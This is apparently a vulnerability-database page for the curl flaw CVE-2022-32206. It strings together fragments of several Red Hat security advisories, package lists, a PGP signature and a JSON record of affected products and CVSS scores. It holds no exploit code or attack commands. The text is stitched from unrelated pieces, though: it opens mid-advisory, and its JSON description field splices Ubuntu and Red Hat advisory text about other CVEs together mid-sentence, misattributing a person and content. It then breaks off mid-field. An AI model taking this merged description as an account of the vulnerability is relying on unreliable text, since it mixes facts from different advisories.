You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.

Security updates:

moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
vm2: Sandbox Escape in vm2 (CVE-2022-36067)

Bug fix:

MCE 2.0.2 images (BZ# 2104569)
Solution:

For multicluster engine for Kubernetes, see the following documentation for details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online

Bugs fixed (https://bugzilla.redhat.com/):

2104569 - MCE 2.0.2 Images 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2

Bug Fix(es):

Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api (BZ#2033191)
Restart of VM Pod causes SSH keys to be regenerated within VM (BZ#2087177)
Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR (BZ#2089391)
[4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass (BZ#2098225)
Fedora version in DataImportCrons is not 'latest' (BZ#2102694)
[4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted (BZ#2109407)
CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls (BZ#2110562)
Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based (BZ#2112643)
Unable to start windows VMs on PSI setups (BZ#2115371)
[4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 (BZ#2128997)
Mark Windows 11 as TechPreview (BZ#2129013)
4.11.1 rpms (BZ#2139453)

This advisory contains the following OpenShift Virtualization 4.11.1 images.

RHEL-8-CNV-4.11

virt-cdi-operator-container-v4.11.1-5 virt-cdi-uploadserver-container-v4.11.1-5 virt-cdi-apiserver-container-v4.11.1-5 virt-cdi-importer-container-v4.11.1-5 virt-cdi-controller-container-v4.11.1-5 virt-cdi-cloner-container-v4.11.1-5 virt-cdi-uploadproxy-container-v4.11.1-5 checkup-framework-container-v4.11.1-3 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7 kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7 kubevirt-template-validator-container-v4.11.1-4 virt-handler-container-v4.11.1-5 hostpath-provisioner-operator-container-v4.11.1-4 virt-api-container-v4.11.1-5 vm-network-latency-checkup-container-v4.11.1-3 cluster-network-addons-operator-container-v4.11.1-5 virtio-win-container-v4.11.1-4 virt-launcher-container-v4.11.1-5 ovs-cni-marker-container-v4.11.1-5 hyperconverged-cluster-webhook-container-v4.11.1-7 virt-controller-container-v4.11.1-5 virt-artifacts-server-container-v4.11.1-5 kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7 kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7 libguestfs-tools-container-v4.11.1-5 hostpath-provisioner-container-v4.11.1-4 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7 kubevirt-tekton-tasks-copy-template-container-v4.11.1-7 cnv-containernetworking-plugins-container-v4.11.1-5 bridge-marker-container-v4.11.1-5 virt-operator-container-v4.11.1-5 hostpath-csi-driver-container-v4.11.1-4 kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7 kubemacpool-container-v4.11.1-5 hyperconverged-cluster-operator-container-v4.11.1-7 kubevirt-ssp-operator-container-v4.11.1-4 ovs-cni-plugin-container-v4.11.1-5 kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7 kubevirt-tekton-tasks-operator-container-v4.11.1-2 cnv-must-gather-container-v4.11.1-8 kubevirt-console-plugin-container-v4.11.1-9 hco-bundle-registry-container-v4.11.1-49

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update Advisory ID: RHSA-2022:8840-01 Product: Red Hat JBoss Core Services Advisory URL: https://access.redhat.com/errata/RHSA-2022:8840 Issue date: 2022-12-08 CVE Names: CVE-2022-1292 CVE-2022-2068 CVE-2022-22721 CVE-2022-23943 CVE-2022-26377 CVE-2022-28330 CVE-2022-28614 CVE-2022-28615 CVE-2022-30522 CVE-2022-31813 CVE-2022-32206 CVE-2022-32207 CVE-2022-32208 CVE-2022-32221 CVE-2022-35252 CVE-2022-42915 CVE-2022-42916 ==================================================================== 1. Summary:

An update is now available for Red Hat JBoss Core Services.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Relevant releases/architectures:

Red Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64 Red Hat JBoss Core Services on RHEL 8 - noarch, x86_64

Description:

Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.

This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.51, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.

Security Fix(es):

curl: HSTS bypass via IDN (CVE-2022-42916)
curl: HTTP proxy double-free (CVE-2022-42915)
curl: POST following PUT confusion (CVE-2022-32221)
httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
curl: control code in cookie denial of service (CVE-2022-35252)
jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
curl: Unpreserved file permissions (CVE-2022-32207)
curl: various flaws (CVE-2022-32206 CVE-2022-32208)
openssl: the c_rehash script allows command injection (CVE-2022-2068)
openssl: c_rehash script allows command injection (CVE-2022-1292)
jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Applications using the APR libraries, such as httpd, must be restarted for this update to take effect. After installing the updated packages, the httpd daemon will be restarted automatically.

Bugs fixed (https://bugzilla.redhat.com/):

2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN

Package List:

Red Hat JBoss Core Services on RHEL 7 Server:

Source: jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm jbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm jbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm

noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm

x86_64: jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm jbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm jbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm

Red Hat JBoss Core Services on RHEL 8:

Source: jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm jbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm jbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm

noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm

x86_64: jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm jbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-22721 https://access.redhat.com/security/cve/CVE-2022-23943 https://access.redhat.com/security/cve/CVE-2022-26377 https://access.redhat.com/security/cve/CVE-2022-28330 https://access.redhat.com/security/cve/CVE-2022-28614 https://access.redhat.com/security/cve/CVE-2022-28615 https://access.redhat.com/security/cve/CVE-2022-30522 https://access.redhat.com/security/cve/CVE-2022-31813 https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32207 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/cve/CVE-2022-32221 https://access.redhat.com/security/cve/CVE-2022-35252 https://access.redhat.com/security/cve/CVE-2022-42915 https://access.redhat.com/security/cve/CVE-2022-42916 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9 ws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M WEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf FAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H 0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a z0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j ypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d NcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn Ik+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M onO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9 mCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF 6t6oQh+b3NY=UGfz -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "scalance sc646-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "_id": null,
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "scalance sc622-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "scalance sc642-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.84.0"
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "scalance sc632-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "scalance sc626-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "scalance sc636-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168538"
      },
      {
        "db": "PACKETSTORM",
        "id": "168275"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "168347"
      },
      {
        "db": "PACKETSTORM",
        "id": "170083"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "PACKETSTORM",
        "id": "172765"
      },
      {
        "db": "PACKETSTORM",
        "id": "168284"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2022-32206",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2022-32206",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2022-32206",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-32206",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-32206",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202206-2565",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "curl \u003c 7.84.0 supports \"chained\" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a \"malloc bomb\", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. Harry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\n* moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)\n\n* nodejs16: CRLF injection in node-undici (CVE-2022-31150)\n\n* nodejs/undici: Cookie headers uncleared on cross-origin redirect\n(CVE-2022-31151)\n\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)\n\n* vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect\nYAML changes (BZ# 2074766)\n\n* cluster update status is stuck, also update is not even visible (BZ#\n2079418)\n\n* Policy that creates cluster role is showing as not compliant due to\nRequest entity too large message (BZ# 2088486)\n\n* Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create cluster (BZ#\n2089490)\n\n* ACM Console Becomes Unusable After a Time (BZ# 2097464)\n\n* RHACM 2.4.6 images (BZ# 2100613)\n\n* Cluster Pools with conflicting name of existing clusters in same\nnamespace fails creation and deletes existing cluster (BZ# 2102436)\n\n* ManagedClusters in Pending import state after ACM hub migration 